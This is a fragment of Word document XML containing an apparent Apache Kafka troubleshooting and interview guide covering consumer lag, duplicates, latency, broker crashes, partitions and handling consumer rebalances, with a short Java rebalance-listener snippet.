    <w:p w14:paraId="09F0254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CD31572"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and batch processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA8B89"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number of consumer instances (scale out).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F7C76F"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consumer configs like max.poll.records and fetch.min.bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AABDCC"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thread pool or buffer sizes in consumer apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540181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8837D">
          <v:rect id="_x0000_i3495" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E93A8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3C76C61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399A4DD"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processed multiple times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28568396"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ownstream systems have duplicate records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A02C8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7C10A76"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retries with acks=1 or acks=0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB411C"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ommits offsets before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BDACE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649F2309"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cks=all and enable idempotent producer (enable.idempotence=true).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480FF98C"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Exactly Once Semantics (EOS) if required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E54235"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mmit offsets manually only after successful processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129B6A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F90909">
          <v:rect id="_x0000_i3496" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58503459"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17F52FD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385DF0"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skip or miss messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71788113"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aps in message sequences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC9B4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13DDE9DB"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replication factor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43614216"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0531236F"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fail to commit offsets or commit prematurely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928F9D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4405A6DD"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 increase min.insync.replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF4C7F"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mmit offsets only after message processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C86604E"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 higher replication factor for critical topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2964B5"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DC61B4">
          <v:rect id="_x0000_i3497" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71093B7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High Latency / Low Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3AF1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24397AE"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take longer to arrive at consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EAE80"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experience slow publish times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2219387F"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3C992B5E"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sync sends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2176B6"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disk bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3FB7C"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brokers or consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386395F2"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F7C2CD8"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producer settings: batch.size, linger.ms, compression.type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D142B2"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brokers or upgrade to SSDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8738B"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and broker JVM settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75755CE8"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9D2283">
          <v:rect id="_x0000_i3498" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="327A201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Broker or JVM Crashes (OOM Errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D53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6FD7942D"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 restarts unexpectedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C719E"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 or GC pressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F8A3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4E58B29"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05188C6C"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sufficient heap size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFCDA0"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mory leaks in producer/consumer code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410240D"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A43F805"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6C8E7D81"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and garbage collection settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171A5B7"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memory usage and profile applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEF2E07"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41D98D">
          <v:rect id="_x0000_i3499" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5A67F"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Issues (Pre-KRaft Mode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A913BF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40B646CD"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register with ZooKeeper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6F8AC"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ship elections fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3E9BE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F0AAD6"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t running or in bad state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD6C87B"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connectivity issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5F085"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3679165A"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ZooKeeper nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5B543C"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zookeeper.connect configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB5DF5"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Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KRaft mode</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in newer versions (removes ZooKeeper dependency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1069E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3C786">
          <v:rect id="_x0000_i3500" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BAA98B"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oo Many Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B06F3F0"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Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9321A"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memory spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4593E949"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 elections become slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56696731"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min operations lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A89C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37CD206"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configuration or overuse of partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1692224C"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 with too many small partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A89A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3C00040"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evaluate and reduce partition counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6416E"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rge or compact small topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71992347"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broker partition limits (~4000 per broker is a common threshold).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB40A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A163A">
          <v:rect id="_x0000_i3501" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1AE7E8"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Producer Timeout or Retries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F887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5625D1A"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fails to send messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799A6045"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ry count is high.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326C2F4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5D9193"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA6A0BF"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are slow to acknowledge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671B26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12D5EC4B"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quest.timeout.ms and delivery.timeout.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D6A8A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retries with backoff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D11CDD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idempotent producer to avoid duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B5901F" w14:textId="68975E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502" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="229D3A62" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="00CE4B95" w:rsidRDefault="00F4512C" w:rsidP="00F4512C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="871" w:name="_Toc197868085"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Kafka’s Consumer Rebalance, and how do you handle it in a large-scale system?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="871"/>
    </w:p>
    <w:p w14:paraId="6136A1B3" w14:textId="1CB62E66" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C"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is Kafka’s Consumer Rebalance?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E634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xml:space="preserve"> is a process in Apache Kafka where </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka reassigns topic partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> among consumers within the same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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576491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E04F55">
          <v:rect id="_x0000_i3503" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DEA4C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y Rebalancing Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963A98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balancing occurs when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B6DF8"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new consumer joins</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67669956"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existing consumer leaves</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661554B4"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ubscribed topic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artitions change</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F5CC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5078A0">
          <v:rect id="_x0000_i3504" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476FA8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Happens During Rebalance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376351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consumers in the group are </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>paused</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E036D5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA4640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ach consumer </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>drops</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> its current assignment and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>regains</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new set of partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199ECB98"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058A2">
          <v:rect id="_x0000_i3505" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF558A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Impacts of Frequent Rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E565DE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unavailability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E188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erformance degradation</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to pausing of consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE0AFB1"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ssible </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate process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offset loss</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if not handled properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC0E44D"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C515C4">
          <v:rect id="_x0000_i3506" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03575B"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Handling Consumer Rebalance in Large-Scale Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3B21C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Implement a Rebalance Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8C133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vides ConsumerRebalanceListener to allow custom logic during rebalancing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA97F9"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Arrays.asList("topic1"), new ConsumerRebalanceListener() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443507B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4175022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Commit offsets or cleanup before losing ownership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E00E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6E87BC92" w14:textId="77777777" w:rsidR="00F4512C" w:rsidRPr="004269A3" w:rsidRDefault="00F4512C" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685A218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    public void onPartitionsAssigned(Collection&lt;TopicPartition&gt; partitions) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6097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eek to last committed offset if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C65317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7128181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2A3042F5"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0F505">
          <v:rect id="_x0000_i3507" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885715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operative Sticky Assignor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525AFE1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2.4+ supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cooperative Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to minimize partition shuffling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D365A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53EF2CE1"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lps maintain </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sticky assignments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19998796"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s </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stop-the-world</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rebalances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F342C9"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47B1C">
          <v:rect id="_x0000_i3508" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C55E2D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Commit Offsets Properly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB8F44"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commitSync() or commitAsync()) after processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E42302"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committing offsets </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>before</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> actual processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031FCE82"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3C726">
          <v:rect id="_x0000_i3509" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76420F5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onitor and Tune Rebalance Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F536CB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ortant configs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DF5C2"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 Time to detect consumer failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149C813"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 Max delay between poll() calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668D6E5F"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 Frequency of heartbeat to Kafka broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD01AD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BDED0">
          <v:rect id="_x0000_i3510" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1716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pread Consumer Startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588886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many consumers start simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089A40A5"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troduce </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dela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staggered starts</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid mass rebalancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AEB822"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in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>autoscaling environments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DAC10C"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F9B85">
          <v:rect id="_x0000_i3511" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CDB41"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Use Static Membership (Kafka 2.3+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE403B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rebalancing when a consumer restarts by setting a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static group.instance.id</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E3DD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614674AF"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get the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F73DC8"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Great for stateful consumers like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360A043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FB81">
          <v:rect id="_x0000_i3512" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="394F79C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250"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="5AEC512F" w14:textId="77777777" w:rsidTr="00F4512C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3900C1E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D1BB49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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
